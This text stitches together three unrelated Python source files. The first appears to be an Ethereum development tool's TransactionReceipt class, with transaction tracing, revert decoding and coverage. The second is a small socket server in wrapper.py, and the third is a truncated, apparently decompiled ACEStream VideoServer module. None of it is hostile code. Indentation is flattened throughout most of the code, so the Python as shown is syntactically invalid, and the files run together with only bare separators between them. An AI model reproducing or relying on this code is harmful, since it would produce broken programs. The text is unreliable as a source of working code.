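#                          # otherwise lazily triggers debug_traceTransaction
#     tx.call_trace()      # raises NotImplementedError for deployment txs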
class TransactionReceipt:
"""Attributes and methods relating to a broadcasted transaction.
* All ether values are given as integers denominated in wei.
* Before the tx has confirmed, most attributes are set to None
* Accessing methods / attributes that query debug_traceTransaction
may be very slow if the transaction involved many steps
Attributes:
contract_name: Name of the contract called in the transaction
fn_name: Name of the method called in the transaction
txid: Transaction ID
sender: Address of the sender
receiver: Address of the receiver
value: Amount transferred
gas_price: Gas price
gas_limit: Gas limit
gas_used: Gas used
input: Hexstring input data
confirmations: The number of blocks since the transaction was confirmed
nonce: Transaction nonce
block_number: Block number this transaction was included in
timestamp: Timestamp of the block this transaction was included in
txindex: Index of the transaction within the mined block
contract_address: Address of contract deployed by the transaction
logs: Raw transaction logs
status: Transaction status: -1 pending, 0 reverted, 1 successful
Additional attributes:
(only available if debug_traceTransaction is enabled in the RPC)
events: Decoded transaction log events
trace: Expanded stack trace from debug_traceTransaction
return_value: Return value(s) from contract call
        revert_msg: Error string from reverted contract call
modified_state: Boolean, did this contract write to storage?"""
# these are defined as class attributes to expose them in console completion hints
block_number = None
contract_address: Optional[str] = None
contract_name = None
fn_name = None
gas_used = None
logs = None
nonce = None
sender = None
txid = None
txindex = None
def __init__(
self,
txid: Union[str, bytes],
sender: Any = None,
silent: bool = True,
required_confs: int = 1,
name: str = "",
revert_data: Optional[Tuple] = None,
) -> None:
"""Instantiates a new TransactionReceipt object.
Args:
txid: hexstring transaction ID
sender: sender as a hex string or Account object
required_confs: the number of required confirmations before processing the receipt
silent: toggles console verbosity (default True)
name: contract function being called
revert_data: (revert string, program counter, revert type)
"""
self._silent = silent
if isinstance(txid, bytes):
txid = HexBytes(txid).hex()
if not self._silent:
print(f"Transaction sent: {color('bright blue')}{txid}{color}")
# internal attributes
self._trace_exc = None
self._trace_origin = None
self._raw_trace = None
self._trace = None
self._call_cost = 0
self._events = None
self._return_value = None
self._revert_msg = None
self._modified_state = None
self._new_contracts = None
self._internal_transfers = None
self._subcalls: Optional[List[Dict]] = None
self._confirmed = threading.Event()
# attributes that can be set immediately
self.sender = sender
self.status = -1
self.txid = txid
self.contract_name = None
self.fn_name = name
if name and "." in name:
self.contract_name, self.fn_name = name.split(".", maxsplit=1)
# avoid querying the trace to get the revert string if possible
self._revert_msg, self._revert_pc, revert_type = revert_data or (None, None, None)
if self._revert_msg is None and revert_type not in ("revert", "invalid_opcode"):
self._revert_msg = revert_type
self._await_transaction(required_confs)
# if coverage evaluation is active, evaluate the trace
if (
CONFIG.argv["coverage"]
and not coverage._check_cached(self.coverage_hash)
and self.trace
):
self._expand_trace()
def __repr__(self) -> str:
c = {-1: "bright yellow", 0: "bright red", 1: None}
return f"<Transaction '{color(c[self.status])}{self.txid}{color}'>"
def __hash__(self) -> int:
return hash(self.txid)
@trace_property
def events(self) -> Optional[List]:
if not self.status:
self._get_trace()
return self._events
@trace_property
def internal_transfers(self) -> Optional[List]:
if not self.status:
return []
if self._internal_transfers is None:
self._expand_trace()
return self._internal_transfers
@trace_property
def modified_state(self) -> Optional[bool]:
if not self.status:
self._modified_state = False
elif self._modified_state is None:
self._get_trace()
return self._modified_state
@trace_property
def new_contracts(self) -> Optional[List]:
if not self.status:
return []
if self._new_contracts is None:
self._expand_trace()
return self._new_contracts
@trace_property
def return_value(self) -> Optional[str]:
if not self.status:
return None
if self._return_value is None:
self._get_trace()
return self._return_value
@trace_property
def revert_msg(self) -> Optional[str]:
if self.status:
return None
if self._revert_msg is None:
self._get_trace()
elif self.contract_address and self._revert_msg == "out of gas":
self._get_trace()
return self._revert_msg
@trace_property
def subcalls(self) -> Optional[List]:
if self._subcalls is None:
self._expand_trace()
return self._subcalls
@trace_property
def trace(self) -> Optional[List]:
if self._trace is None:
self._expand_trace()
return self._trace
@property
def timestamp(self) -> Optional[int]:
if self.status == -1:
return None
return web3.eth.getBlock(self.block_number)["timestamp"]
@property
def confirmations(self) -> int:
if not self.block_number:
return 0
return web3.eth.blockNumber - self.block_number + 1
def wait(self, required_confs: int) -> None:
if self.confirmations > required_confs:
print(f"This transaction already has {self.confirmations} confirmations.")
return
while True:
try:
tx: Dict = web3.eth.getTransaction(self.txid)
break
except TransactionNotFound:
time.sleep(0.5)
self._await_confirmation(tx, required_confs)
def _raise_if_reverted(self, exc: Any) -> None:
if self.status or CONFIG.mode == "console":
return
if self._revert_msg is None:
# no revert message and unable to check dev string - have to get trace
self._expand_trace()
if self.contract_address:
source = ""
elif CONFIG.argv["revert"]:
source = self._traceback_string()
else:
source = self._error_string(1)
raise exc._with_attr(source=source, revert_msg=self._revert_msg)
def _await_transaction(self, required_confs: int = 1) -> None:
# await tx showing in mempool
while True:
try:
tx: Dict = web3.eth.getTransaction(self.txid)
break
except TransactionNotFound:
if self.sender is None:
# if sender was not explicitly set, this transaction was
# not broadcasted locally and so likely doesn't exist
raise
time.sleep(0.5)
self._set_from_tx(tx)
if not self._silent:
print(
f" Gas price: {color('bright blue')}{self.gas_price / 10 ** 9}{color} gwei"
f" Gas limit: {color('bright blue')}{self.gas_limit}{color}"
)
# await confirmation of tx in a separate thread which is blocking if required_confs > 0
confirm_thread = threading.Thread(
target=self._await_confirmation, args=(tx, required_confs), daemon=True
)
confirm_thread.start()
if required_confs > 0:
confirm_thread.join()
def _await_confirmation(self, tx: Dict, required_confs: int = 1) -> None:
if not tx["blockNumber"] and not self._silent and required_confs > 0:
if required_confs == 1:
print("Waiting for confirmation...")
else:
sys.stdout.write(
f"\rRequired confirmations: {color('bright yellow')}0/"
f"{required_confs}{color}"
)
sys.stdout.flush()
# await first confirmation
receipt = web3.eth.waitForTransactionReceipt(self.txid, timeout=None, poll_latency=0.5)
self.block_number = receipt["blockNumber"]
# wait for more confirmations if required and handle uncle blocks
remaining_confs = required_confs
while remaining_confs > 0 and required_confs > 1:
try:
receipt = web3.eth.getTransactionReceipt(self.txid)
self.block_number = receipt["blockNumber"]
except TransactionNotFound:
if not self._silent:
sys.stdout.write(f"\r{color('red')}Transaction was lost...{color}{' ' * 8}")
sys.stdout.flush()
# check if tx is still in mempool, this will raise otherwise
tx = web3.eth.getTransaction(self.txid)
self.block_number = None
return self._await_confirmation(tx, required_confs)
if required_confs - self.confirmations != remaining_confs:
remaining_confs = required_confs - self.confirmations
if not self._silent:
sys.stdout.write(
f"\rRequired confirmations: {color('bright yellow')}{self.confirmations}/"
f"{required_confs}{color} "
)
if remaining_confs == 0:
sys.stdout.write("\n")
sys.stdout.flush()
if remaining_confs > 0:
time.sleep(1)
self._set_from_receipt(receipt)
self._confirmed.set()
if not self._silent and required_confs > 0:
print(self._confirm_output())
def _set_from_tx(self, tx: Dict) -> None:
if not self.sender:
self.sender = EthAddress(tx["from"])
self.receiver = EthAddress(tx["to"]) if tx["to"] else None
self.value = Wei(tx["value"])
self.gas_price = tx["gasPrice"]
self.gas_limit = tx["gas"]
self.input = tx["input"]
self.nonce = tx["nonce"]
# if receiver is a known contract, set function name
if not self.fn_name and state._find_contract(tx["to"]) is not None:
contract = state._find_contract(tx["to"])
self.contract_name = contract._name
self.fn_name = contract.get_method(tx["input"])
def _set_from_receipt(self, receipt: Dict) -> None:
"""Sets object attributes based on the transaction reciept."""
self.block_number = receipt["blockNumber"]
self.txindex = receipt["transactionIndex"]
self.gas_used = receipt["gasUsed"]
self.logs = receipt["logs"]
self.status = receipt["status"]
self.contract_address = receipt["contractAddress"]
if self.contract_address and not self.contract_name:
self.contract_name = "UnknownContract"
base = (
f"{self.nonce}{self.block_number}{self.sender}{self.receiver}"
f"{self.value}{self.input}{self.status}{self.gas_used}{self.txindex}"
)
self.coverage_hash = sha1(base.encode()).hexdigest()
if self.status:
self._events = _decode_logs(receipt["logs"])
if self.fn_name:
state.TxHistory()._gas(self._full_name(), receipt["gasUsed"])
def _confirm_output(self) -> str:
status = ""
if not self.status:
status = f"({color('bright red')}{self.revert_msg or 'reverted'}{color}) "
result = (
f" {self._full_name()} confirmed {status}- "
f"Block: {color('bright blue')}{self.block_number}{color} "
f"Gas used: {color('bright blue')}{self.gas_used}{color} "
f"({color('bright blue')}{self.gas_used / self.gas_limit:.2%}{color})"
)
if self.status and self.contract_address:
result += (
f"\n {self.contract_name} deployed at: "
f"{color('bright blue')}{self.contract_address}{color}"
)
return result + "\n"
def _get_trace(self) -> None:
"""Retrieves the stack trace via debug_traceTransaction and finds the
return value, revert message and event logs in the trace.
"""
# check if trace has already been retrieved, or the tx warrants it
if self._raw_trace is not None:
return
self._raw_trace = []
if self.input == "0x" and self.gas_used == 21000:
self._modified_state = False
self._trace = []
return
try:
trace = web3.provider.make_request( # type: ignore
"debug_traceTransaction", (self.txid, {"disableStorage": CONFIG.mode != "console"})
)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
msg = f"Encountered a {type(e).__name__} while requesting "
msg += "debug_traceTransaction. The local RPC client has likely crashed."
if CONFIG.argv["coverage"]:
msg += " If the error persists, add the skip_coverage fixture to this test."
raise RPCRequestError(msg) from None
if "error" in trace:
self._modified_state = None
self._trace_exc = RPCRequestError(trace["error"]["message"])
raise self._trace_exc
self._raw_trace = trace = trace["result"]["structLogs"]
if not trace:
self._modified_state = False
return
if isinstance(trace[0]["gas"], str):
# handle traces where numeric values are returned as hex (Nethermind)
for step in trace:
step["gas"] = int(step["gas"], 16)
step["gasCost"] = int.from_bytes(HexBytes(step["gasCost"]), "big", signed=True)
step["pc"] = int(step["pc"], 16)
if self.status:
self._confirmed_trace(trace)
else:
self._reverted_trace(trace)
def _confirmed_trace(self, trace: Sequence) -> None:
self._modified_state = next((True for i in trace if i["op"] == "SSTORE"), False)
if trace[-1]["op"] != "RETURN" or self.contract_address:
return
contract = state._find_contract(self.receiver)
if contract:
data = _get_memory(trace[-1], -1)
fn = contract.get_method_object(self.input)
self._return_value = fn.decode_output(data)
def _reverted_trace(self, trace: Sequence) -> None:
self._modified_state = False
# get events from trace
self._events = _decode_trace(trace, str(self.receiver or self.contract_address))
if self.contract_address:
step = next((i for i in trace if i["op"] == "CODECOPY"), None)
if step is not None and int(step["stack"][-3], 16) > 24577:
self._revert_msg = "exceeds EIP-170 size limit"
if self._revert_msg is not None:
return
# iterate over revert instructions in reverse to find revert message
for step in (i for i in trace[::-1] if i["op"] in ("REVERT", "INVALID")):
if step["op"] == "REVERT" and int(step["stack"][-2], 16):
# get returned error string from stack
data = _get_memory(step, -1)[4:]
self._revert_msg = decode_abi(["string"], data)[0]
return
if self.contract_address:
self._revert_msg = "invalid opcode" if step["op"] == "INVALID" else ""
return
# check for dev revert string using program counter
self._revert_msg = build._get_dev_revert(step["pc"])
if self._revert_msg is not None:
return
# if none is found, expand the trace and get it from the pcMap
self._expand_trace()
try:
pc_map = state._find_contract(step["address"])._build["pcMap"]
# if this is the function selector revert, check for a jump
if "first_revert" in pc_map[step["pc"]]:
i = trace.index(step) - 4
if trace[i]["pc"] != step["pc"] - 4:
step = trace[i]
self._revert_msg = pc_map[step["pc"]]["dev"]
return
except (KeyError, AttributeError):
pass
step = next(i for i in trace[::-1] if i["op"] in ("REVERT", "INVALID"))
self._revert_msg = "invalid opcode" if step["op"] == "INVALID" else ""
def _expand_trace(self) -> None:
"""Adds the following attributes to each step of the stack trace:
address: The address executing this contract.
contractName: The name of the contract.
fn: The name of the function.
jumpDepth: Number of jumps made since entering this contract. The
initial value is 0.
source: {
filename: path to the source file for this step
offset: Start and end offset associated source code
}
"""
if self._trace is not None:
return
if self._raw_trace is None:
self._get_trace()
self._trace = trace = self._raw_trace
self._new_contracts = []
self._internal_transfers = []
self._subcalls = []
if self.contract_address or not trace:
coverage._add_transaction(self.coverage_hash, {})
return
if "fn" in trace[0]:
return
if trace[0]["depth"] == 1:
self._trace_origin = "geth"
self._call_cost = self.gas_used - trace[0]["gas"] + trace[-1]["gas"]
for t in trace:
t["depth"] = t["depth"] - 1
else:
self._trace_origin = "ganache"
self._call_cost = trace[0]["gasCost"]
for i in range(len(trace) - 1):
trace[i]["gasCost"] = trace[i + 1]["gasCost"]
trace[-1]["gasCost"] = 0
# last_map gives a quick reference of previous values at each depth
last_map = {0: _get_last_map(self.receiver, self.input[:10])} # type: ignore
coverage_eval: Dict = {last_map[0]["name"]: {}}
for i in range(len(trace)):
# if depth has increased, tx has called into a different contract
if trace[i]["depth"] > trace[i - 1]["depth"]:
step = trace[i - 1]
if step["op"] in ("CREATE", "CREATE2"):
# creating a new contract
out = next(x for x in trace[i:] if x["depth"] == step["depth"])
address = out["stack"][-1][-40:]
sig = f"<{step['op']}>"
calldata = None
self._new_contracts.append(EthAddress(address))
if int(step["stack"][-1], 16):
self._add_internal_xfer(step["address"], address, step["stack"][-1])
else:
# calling an existing contract
stack_idx = -4 if step["op"] in ("CALL", "CALLCODE") else -3
offset = int(step["stack"][stack_idx], 16)
length = int(step["stack"][stack_idx - 1], 16)
calldata = HexBytes("".join(step["memory"]))[offset : offset + length]
sig = calldata[:4].hex()
address = step["stack"][-2][-40:]
last_map[trace[i]["depth"]] = _get_last_map(address, sig)
coverage_eval.setdefault(last_map[trace[i]["depth"]]["name"], {})
self._subcalls.append(
{"from": step["address"], "to": EthAddress(address), "op": step["op"]}
)
if step["op"] in ("CALL", "CALLCODE"):
self._subcalls[-1]["value"] = int(step["stack"][-3], 16)
if calldata and last_map[trace[i]["depth"]].get("function"):
fn = last_map[trace[i]["depth"]]["function"]
zip_ = zip(fn.abi["inputs"], fn.decode_input(calldata))
self._subcalls[-1].update(
inputs={i[0]["name"]: i[1] for i in zip_}, # type:ignore
function=fn._input_sig,
)
elif calldata:
self._subcalls[-1]["calldata"] = calldata
# update trace from last_map
last = last_map[trace[i]["depth"]]
trace[i].update(
address=last["address"],
contractName=last["name"],
fn=last["internal_calls"][-1],
jumpDepth=last["jumpDepth"],
source=False,
)
opcode = trace[i]["op"]
if opcode == "CALL" and int(trace[i]["stack"][-3], 16):
self._add_internal_xfer(
last["address"], trace[i]["stack"][-2][-40:], trace[i]["stack"][-3]
)
if not last["pc_map"]:
continue
pc = last["pc_map"][trace[i]["pc"]]
if trace[i]["depth"] and opcode in ("RETURN", "REVERT", "INVALID", "SELFDESTRUCT"):
subcall: dict = next(
i for i in self._subcalls[::-1] if i["to"] == last["address"] # type: ignore
)
if opcode == "RETURN":
data = _get_memory(trace[i], -1)
subcall["return_value"] = None
if data:
fn = last["function"]
return_values = fn.decode_output(data)
if len(fn.abi["outputs"]) == 1:
return_values = (return_values,)
subcall["return_value"] = return_values
elif opcode == "SELFDESTRUCT":
subcall["selfdestruct"] = True
else:
if opcode == "REVERT":
data = _get_memory(trace[i], -1)[4:]
if data:
subcall["revert_msg"] = decode_abi(["string"], data)[0]
if "revert_msg" not in subcall and "dev" in pc:
subcall["revert_msg"] = pc["dev"]
if "path" not in pc:
continue
trace[i]["source"] = {"filename": last["path_map"][pc["path"]], "offset": pc["offset"]}
if "fn" not in pc:
continue
# calculate coverage
if last["coverage"]:
if pc["path"] not in coverage_eval[last["name"]]:
coverage_eval[last["name"]][pc["path"]] = [set(), set(), set()]
if "statement" in pc:
coverage_eval[last["name"]][pc["path"]][0].add(pc["statement"])
if "branch" in pc:
if pc["op"] != "JUMPI":
last["active_branches"].add(pc["branch"])
elif "active_branches" not in last or pc["branch"] in last["active_branches"]:
# false, true
key = 1 if trace[i + 1]["pc"] == trace[i]["pc"] + 1 else 2
coverage_eval[last["name"]][pc["path"]][key].add(pc["branch"])
if "active_branches" in last:
last["active_branches"].remove(pc["branch"])
# ignore jumps with no function - they are compiler optimizations
if "jump" in pc:
# jump 'i' is calling into an internal function
if pc["jump"] == "i":
try:
fn = last["pc_map"][trace[i + 1]["pc"]]["fn"]
except (KeyError, IndexError):
continue
if fn != last["internal_calls"][-1]:
last["internal_calls"].append(fn)
last["jumpDepth"] += 1
# jump 'o' is returning from an internal function
elif last["jumpDepth"] > 0:
del last["internal_calls"][-1]
last["jumpDepth"] -= 1
coverage._add_transaction(
self.coverage_hash, dict((k, v) for k, v in coverage_eval.items() if v)
)
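    # Usage sketch (illustrative only): once the trace has been expanded, each
    # step in `self.trace` carries the extra keys documented above, e.g. for a
    # TransactionReceipt `tx`:
    #
    #     step = tx.trace[-1]
    #     step["contractName"], step["fn"], step["jumpDepth"], step["source"]
    #
    # The key names mirror the ones set in `_expand_trace`.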
def _add_internal_xfer(self, from_: str, to: str, value: str) -> None:
self._internal_transfers.append( # type: ignore
{"from": EthAddress(from_), "to": EthAddress(to), "value": Wei(f"0x{value}")}
)
def _full_name(self) -> str:
if self.contract_name and self.fn_name:
return f"{self.contract_name}.{self.fn_name}"
return self.fn_name or "Transaction"
def info(self) -> None:
"""Displays verbose information about the transaction, including decoded event logs."""
status = ""
if not self.status:
status = f"({color('bright red')}{self.revert_msg or 'reverted'}{color})"
result = (
f"Transaction was Mined {status}\n---------------------\n"
f"Tx Hash: {color('bright blue')}{self.txid}\n"
f"From: {color('bright blue')}{self.sender}\n"
)
if self.contract_address and self.status:
result += (
f"New {self.contract_name} address: {color('bright blue')}{self.contract_address}\n"
)
else:
result += (
f"To: {color('bright blue')}{self.receiver}{color}\n"
f"Value: {color('bright blue')}{self.value}\n"
)
if self.input != "0x" and int(self.input, 16):
result += f"Function: {color('bright blue')}{self._full_name()}\n"
result += (
f"Block: {color('bright blue')}{self.block_number}{color}\nGas Used: "
f"{color('bright blue')}{self.gas_used}{color} / {color('bright blue')}{self.gas_limit}"
f"{color} ({color('bright blue')}{self.gas_used / self.gas_limit:.1%}{color})\n"
)
if self.events:
result += "\n Events In This Transaction\n --------------------------"
for event in self.events: # type: ignore
result += f"\n {color('bright yellow')}{event.name}{color}" # type: ignore
for key, value in event.items(): # type: ignore
result += f"\n {key}: {color('bright blue')}{value}{color}"
print(result)
def _get_trace_gas(self, start: int, stop: int) -> Tuple[int, int]:
total_gas = 0
internal_gas = 0
is_internal = True
trace = self.trace
for i in range(start, stop):
# Check if we are in a subfunction or not
if is_internal and not _step_compare(trace[i], trace[start]):
is_internal = False
# For the internal gas tracking we ignore the gas passed to an external call
if trace[i]["depth"] > trace[start]["depth"]:
internal_gas -= trace[i - 1]["gasCost"]
elif not is_internal and _step_compare(trace[i], trace[start]):
is_internal = True
total_gas += trace[i]["gasCost"]
if is_internal:
internal_gas += trace[i]["gasCost"]
# manually add gas refunds where they occur
if trace[i]["op"] == "SSTORE" and int(trace[i]["stack"][-2], 16) == 0:
# 15000 gas is refunded if a word is set to 0x0
# Note: There is currently no way to check if the value was 0x0 before.
# This will give an incorrect refund if 0x0 is assigned to 0x0.
total_gas -= 15000
if is_internal:
internal_gas -= 15000
if trace[i]["op"] == "SELFDESTRUCT":
# 24000 gas is refunded on selfdestruct
total_gas -= 24000
if is_internal:
internal_gas -= 24000
# For external calls, add the remaining gas returned back
if start > 0 and trace[start]["depth"] > trace[start - 1]["depth"]:
total_gas += trace[start - 1]["gasCost"]
internal_gas += trace[start - 1]["gasCost"]
return internal_gas, total_gas
@trace_inspection
def call_trace(self, expand: bool = False) -> None:
"""
Display the complete sequence of contracts and methods called during
the transaction. The format:
Contract.functionName [instruction] start:stop [gas used]
* start:stop are index values for the `trace` member of this object,
showing the points where the call begins and ends
* for calls that include subcalls, gas use is displayed as
[gas used in this frame / gas used in this frame + subcalls]
* Calls displayed in red ended with a `REVERT` or `INVALID` instruction.
Arguments
---------
expand : bool
If `True`, show an expanded call trace including inputs and return values
"""
trace = self.trace
key = _step_internal(
trace[0], trace[-1], 0, len(trace), self._get_trace_gas(0, len(self.trace))
)
call_tree: OrderedDict = OrderedDict({key: OrderedDict()})
active_tree = [call_tree[key]]
        # (index, depth, jumpDepth) for relevant steps in the trace
trace_index = [(0, 0, 0)] + [
(i, trace[i]["depth"], trace[i]["jumpDepth"])
for i in range(1, len(trace))
if not _step_compare(trace[i], trace[i - 1])
]
subcalls = self.subcalls[::-1]
for i, (idx, depth, jump_depth) in enumerate(trace_index[1:], start=1):
last = trace_index[i - 1]
if depth == last[1] and jump_depth < last[2]:
# returning from an internal function, reduce tree by one
active_tree.pop()
continue
elif depth < last[1]:
                # returning from an external call, pop the tree back by the previous frame's jumpDepth + 1
active_tree = active_tree[: -(last[2] + 1)]
continue
if depth > last[1]:
# called to a new contract
end = next((x[0] for x in trace_index[i + 1 :] if x[1] < depth), len(trace))
total_gas, internal_gas = self._get_trace_gas(idx, end)
key = _step_external(
trace[idx],
trace[end - 1],
idx,
end,
(total_gas, internal_gas),
subcalls.pop(),
expand,
)
elif depth == last[1] and jump_depth > last[2]:
# jumped into an internal function
end = next(
(
x[0]
for x in trace_index[i + 1 :]
if x[1] < depth or (x[1] == depth and x[2] < jump_depth)
),
len(trace),
)
total_gas, internal_gas = self._get_trace_gas(idx, end)
key = _step_internal(
trace[idx], trace[end - 1], idx, end, (total_gas, internal_gas)
)
active_tree[-1][key] = OrderedDict()
active_tree.append(active_tree[-1][key])
print(
f"Call trace for '{color('bright blue')}{self.txid}{color}':\n"
f"Initial call cost [{color('bright yellow')}{self._call_cost} gas{color}]"
)
print(build_tree(call_tree).rstrip())
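    # Usage sketch (illustrative only): assuming a mined TransactionReceipt `tx`,
    #
    #     tx.call_trace()             # condensed call tree
    #     tx.call_trace(expand=True)  # include decoded inputs / return values
    #
    # Each printed line follows `Contract.functionName [instruction] start:stop
    # [gas used]`, as described in the docstring above.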
def traceback(self) -> None:
print(self._traceback_string() or "")
@trace_inspection
def _traceback_string(self) -> str:
"""Returns an error traceback for the transaction."""
if self.status == 1:
return ""
trace = self.trace
try:
idx = next(i for i in range(len(trace)) if trace[i]["op"] in ("REVERT", "INVALID"))
trace_range = range(idx, -1, -1)
except StopIteration:
return ""
result = [next(i for i in trace_range if trace[i]["source"])]
depth, jump_depth = trace[idx]["depth"], trace[idx]["jumpDepth"]
while True:
try:
idx = next(
i
for i in trace_range
if trace[i]["depth"] < depth
or (trace[i]["depth"] == depth and trace[i]["jumpDepth"] < jump_depth)
)
result.append(idx)
depth, jump_depth = trace[idx]["depth"], trace[idx]["jumpDepth"]
except StopIteration:
break
return f"{color}Traceback for '{color('bright blue')}{self.txid}{color}':\n" + "\n".join(
self._source_string(i, 0) for i in result[::-1]
)
def error(self, pad: int = 3) -> None:
print(self._error_string(pad) or "")
@trace_inspection
def _error_string(self, pad: int = 3) -> str:
"""Returns the source code that caused the transaction to revert.
Args:
pad: Number of unrelated lines of code to include before and after
Returns: source code string
"""
if self.status == 1:
return ""
# if RPC returned a program counter, try to find source without querying trace
if self._revert_pc:
highlight, linenos, path, fn_name = build._get_error_source_from_pc(self._revert_pc)
if highlight:
return _format_source(highlight, linenos, path, self._revert_pc, -1, fn_name)
self._revert_pc = None
# iterate backward through the trace until a step has a source offset
trace = self.trace
trace_range = range(len(trace) - 1, -1, -1)
try:
idx = next(i for i in trace_range if trace[i]["op"] in {"REVERT", "INVALID"})
idx = next(i for i in trace_range if trace[i]["source"])
return self._source_string(idx, pad)
except StopIteration:
return ""
def source(self, idx: int, pad: int = 3) -> None:
print(self._source_string(idx, pad) or "")
@trace_inspection
def _source_string(self, idx: int, pad: int) -> str:
"""Displays the associated source code for a given stack trace step.
Args:
idx: Stack trace step index
pad: Number of unrelated lines of code to include before and after
Returns: source code string
"""
trace = self.trace[idx]
if not trace.get("source", None):
return ""
contract = state._find_contract(self.trace[idx]["address"])
source, linenos = highlight_source(
contract._sources.get(trace["source"]["filename"]), trace["source"]["offset"], pad
)
if not source:
return ""
return _format_source(
source,
linenos,
trace["source"]["filename"],
trace["pc"],
self.trace.index(trace),
trace["fn"],
)
def _format_source(source: str, linenos: Tuple, path: Path, pc: int, idx: int, fn_name: str) -> str:
ln = f" {color('bright blue')}{linenos[0]}"
if linenos[1] > linenos[0]:
ln = f"s{ln}{color('dark white')}-{color('bright blue')}{linenos[1]}"
return (
f"{color('dark white')}Trace step {color('bright blue')}{idx}{color('dark white')}, "
f"program counter {color('bright blue')}{pc}{color('dark white')}:\n {color('dark white')}"
f"File {color('bright magenta')}\"{path}\"{color('dark white')}, line{ln}"
f"{color('dark white')}, in {color('bright cyan')}{fn_name}{color('dark white')}:{source}"
)
def _step_compare(a: Dict, b: Dict) -> bool:
return a["depth"] == b["depth"] and a["jumpDepth"] == b["jumpDepth"]
def _step_internal(
step: Dict,
last_step: Dict,
start: Union[str, int],
stop: Union[str, int],
gas: Tuple[int, int],
subcall: Dict = None,
) -> str:
if last_step["op"] in {"REVERT", "INVALID"} and _step_compare(step, last_step):
contract_color = color("bright red")
else:
contract_color = color("bright cyan") if not step["jumpDepth"] else color()
key = f"{color('dark white')}{contract_color}{step['fn']} {color('dark white')}"
left_bracket = f"{color('dark white')}["
right_bracket = f"{color('dark white')}]"
if subcall:
key = f"{key}[{color}{subcall['op']}{right_bracket} "
key = f"{key}{start}:{stop}{color}"
if gas:
if gas[0] == gas[1]:
gas_str = f"{color('bright yellow')}{gas[0]} gas"
else:
gas_str = f"{color('bright yellow')}{gas[0]} / {gas[1]} gas"
key = f"{key} {left_bracket}{gas_str}{right_bracket}"
if last_step["op"] == "SELFDESTRUCT":
key = f"{key} {left_bracket}{color('bright red')}SELFDESTRUCT{right_bracket}"
return key
def _step_external(
step: Dict,
last_step: Dict,
start: Union[str, int],
stop: Union[str, int],
gas: Tuple[int, int],
subcall: Dict,
expand: bool,
) -> str:
key = _step_internal(step, last_step, start, stop, gas, subcall)
if not expand:
return key
mode = black.FileMode(line_length=60)
result: OrderedDict = OrderedDict({key: {}})
result[key][f"address: {step['address']}"] = None
if "value" in subcall:
result[key][f"value: {subcall['value']}"] = None
if "inputs" not in subcall:
result[key][f"calldata: {subcall['calldata']}"] = None
if subcall["inputs"]:
result[key]["input arguments:"] = [
f"{k}: {black.format_str(str(v), mode=mode)}" for k, v in subcall["inputs"].items()
]
else:
result[key]["input arguments: None"] = None
if "return_value" in subcall:
value = subcall["return_value"]
if isinstance(value, tuple) and len(value) > 1:
result[key]["return values:"] = [black.format_str(str(i), mode=mode) for i in value]
else:
if isinstance(value, tuple):
value = value[0]
value_str = black.format_str(str(value), mode=mode)
result[key][f"return value: {value_str}"] = None
if "revert_msg" in subcall:
result[key][f"revert reason: {color('bright red')}{subcall['revert_msg']}{color}"] = None
return build_tree(result, multiline_pad=0).rstrip()
def _get_memory(step: Dict, idx: int) -> HexBytes:
offset = int(step["stack"][idx], 16)
length = int(step["stack"][idx - 1], 16)
return HexBytes("".join(step["memory"]))[offset : offset + length]
def _get_last_map(address: EthAddress, sig: str) -> Dict:
contract = state._find_contract(address)
last_map = {"address": EthAddress(address), "jumpDepth": 0, "name": None, "coverage": False}
if contract:
if contract.get_method(sig):
full_fn_name = f"{contract._name}.{contract.get_method(sig)}"
else:
full_fn_name = contract._name
last_map.update(
contract=contract,
function=contract.get_method_object(sig),
name=contract._name,
internal_calls=[full_fn_name],
path_map=contract._build.get("allSourcePaths"),
pc_map=contract._build.get("pcMap"),
)
if contract._project:
last_map["coverage"] = True
if contract._build["language"] == "Solidity":
last_map["active_branches"] = set()
else:
last_map.update(contract=None, internal_calls=[f"<UnknownContract>.{sig}"], pc_map=None)
return last_map
|
wrapper.py
|
import socket
from threading import Thread
def echo(name: str, client_id: int, data: list) -> list:
    """ Basic callback function that echoes everything back unchanged """
    return data
class HRTPServer(object):
""" Server object """
def __init__(self, ip="0.0.0.0", port=8088, callback=None):
self.ip = ip
self.port = port
self.callback = callback
self.running = True
# start socket server
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind((self.ip, self.port))
self.socket.listen(1)
def listen(self, conn, addr):
message = []
name = "Unknown"
client_id = 0
message_count = 0
while True:
data = conn.recv(1024)
#skip on no data
if not data: break
# check if hello sent
if data.decode().strip() != "Hello" and message_count == 0:
conn.send(b"?\n")
conn.close()
break
if data.decode().strip() == "End":
conn.send(b"Goodbye\n")
conn.close()
break
# If Over sent, parse message
if data.decode().strip() == "Over":
# Do handshake
if name == "Unknown":
for line in message:
line = line.decode()
if line.split(" ")[0] == "Name:":
name = line.split(" ")[1]
conn.send(("Id: "+ str(client_id) + "\n").encode())
conn.send(b"Ready\nOver\n")
break
if name == "Unknown":
conn.send(b"Who?\n")
conn.send(b"Over\n")
else:
# Send data to callback function
response = self.callback(name, client_id, message[:-1])
                    for line in response:
                        # entries may be bytes (as stored in message); decode before adding the newline
                        if isinstance(line, bytes):
                            line = line.decode()
                        conn.send((line + "\n").encode())
conn.send(b"Over\n")
message = []
message.append(data.strip())
message_count += 1
conn.close()
def start(self, v=False):
while self.running:
conn, addr = self.socket.accept()
if v:
print(f"{addr[0]} connected")
            thread = Thread(target=self.listen, args=(conn, addr))
thread.start()
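if __name__ == "__main__":
    # Minimal usage sketch: serve on the default address/port with the basic
    # echo callback defined above; the verbose flag prints connecting clients.
    server = HRTPServer(callback=echo)
    server.start(v=True)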
|
VideoServer.py
|
#Embedded file name: ACEStream\Video\VideoServer.pyo
import sys
import time
import socket
import BaseHTTPServer
from SocketServer import ThreadingMixIn
from threading import RLock, Thread, currentThread
from traceback import print_stack, print_exc
import string
from cStringIO import StringIO
import os
from ACEStream.GlobalConfig import globalConfig
import ACEStream.Core.osutils
from ACEStream.Core.Utilities.logger import log, log_exc
DEBUG = False
DEBUGCONTENT = False
DEBUGWEBUI = False
DEBUGLOCK = False
DEBUGBASESERV = False
class ConnectionResetError(Exception):
pass
def bytestr2int(b):
if b == '':
return None
else:
return int(b)
class AbstractPathMapper():
def __init__(self):
pass
def get(self, path):
msg = 'AbstractPathMapper: Unknown path ' + path
stream = StringIO(msg)
streaminfo = {'mimetype': 'text/plain',
'stream': stream,
'length': len(msg)}
return streaminfo
class VideoHTTPServer(ThreadingMixIn, BaseHTTPServer.HTTPServer):
__single = None
